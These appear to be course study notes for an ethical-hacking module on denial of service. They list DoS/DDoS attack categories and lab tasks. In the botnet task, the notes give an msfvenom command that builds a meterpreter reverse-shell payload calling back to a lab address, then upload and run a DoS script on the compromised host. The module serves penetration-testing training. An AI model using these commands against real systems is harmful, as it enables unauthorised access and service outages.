Module 10: Denial of Service
Ethical hackers or pen testers use numerous tools and techniques to perform DoS and DDoS attacks on the target network. Recommended labs that will assist you in learning various DoS attack techniques include:
Perform DoS and DDoS attacks using various Techniques
Perform a DDoS attack using ISB and UltraDDOS-v2
Perform a DDoS attack using Botnet
Detect and protect against DoS and DDoS attacks
Detect and protect against DDoS attacks using Anti DDoS Guardian
Lab 1: Perform DoS and DDoS Attacks using Various Techniques
In general, the following are categories of DoS/DDoS attack vectors:
Volumetric Attacks: Consume the bandwidth of the target network or service
Attack techniques:
UDP flood attack
ICMP flood attack
Ping of Death and smurf attack
Pulse wave and zero-day attack
Protocol Attacks: Consume resources like connection state tables present in the network infrastructure components such as load-balancers, firewalls, and application servers
Attack techniques:
SYN flood attack
Fragmentation attack
Spoofed session flood attack
ACK flood attack
Application Layer Attacks: Consume application resources or services, thereby making them unavailable to other legitimate users
Attack techniques:
HTTP GET/POST attack
Slowloris attack
UDP application layer flood attack
DDoS extortion attack
Task 1: Perform a DDoS Attack using ISB and UltraDDOS-v2
Task 2: Perform a DDoS Attack using Botnet
We will require to start the meterpreter session for creating a botnet
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=6969 -f exe > exploit1.exe once we get the shell of meterpreter on the target computer then we will upload and use our eagle dos python script
upload ../../<path>../../eagle-dos.py
python3 eagle-dos.pyLab 2: Detect and Protect Against DoS and DDoS Attacks
Task 1: Detect and Protect Against DDoS Attacks using Anti DDoS Guardian
Last updated